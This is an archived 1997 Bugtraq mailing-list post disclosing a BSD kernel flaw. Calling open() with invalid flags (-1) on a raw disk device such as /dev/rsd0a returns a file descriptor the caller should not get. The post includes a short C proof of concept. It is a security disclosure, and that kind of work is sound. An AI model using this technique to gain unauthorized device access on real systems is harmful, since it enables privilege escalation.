Bugtraq mailing list archives

Possible SERIOUS bug in open()?

From: aleph1 () dfw net (Aleph One)
Date: Thu, 23 Oct 1997 10:04:42 -0500

[ This affects {Free,Net,Open}BSD. Joerg Wunsch fixed it yesterday in
  freebsd-current. - a1 ]

---------- Forwarded message ----------
Date: 17 Oct 1997 10:42:13 -0000
From: explorer () flame org
To: best-of-security () cyber com au
Subject: BoS: Possible SERIOUS bug in open()?

This was sent to me recently...  It seems to be a pretty serious hole
in open() and permissions...

Note, in the following, open() succeeds, and ioctls are probably
executed...

/*
 * This will give you a file descriptor on a device you should not have
 * access to.  This seems really, really screwed up, since holding a fd
 * lets you do a lot of ioctls that you should not be able to do...
 */
#include <fcntl.h>
#include <stdio.h>
#include <unistd.h>
#include <err.h>

int
main(int argc, char **argv)
{
  int fd;

  fd = open("/dev/rsd0a", -1, 0);

  if (fd < 0)
    err(1, "open");
}

Current thread:

ISS Security Alert X-Force (Oct 22)
- Re: ISS Security Alert Aleph One (Oct 22)
- BSDI termcap exploit Joseph_K (Oct 22)
- Possible SERIOUS bug in open()? Aleph One (Oct 23)
- Cute SPARC CPU bug Charles M. Hannum (Oct 24)
  - Re: Cute SPARC CPU bug Dmitry Kohmanyuk Дмитрий Кохманюк (Oct 24)
  - More info on SPARC CPU bug Charles M. Hannum (Oct 24)
- <Possible follow-ups>
- Re: ISS Security Alert David LeBlanc (Oct 23)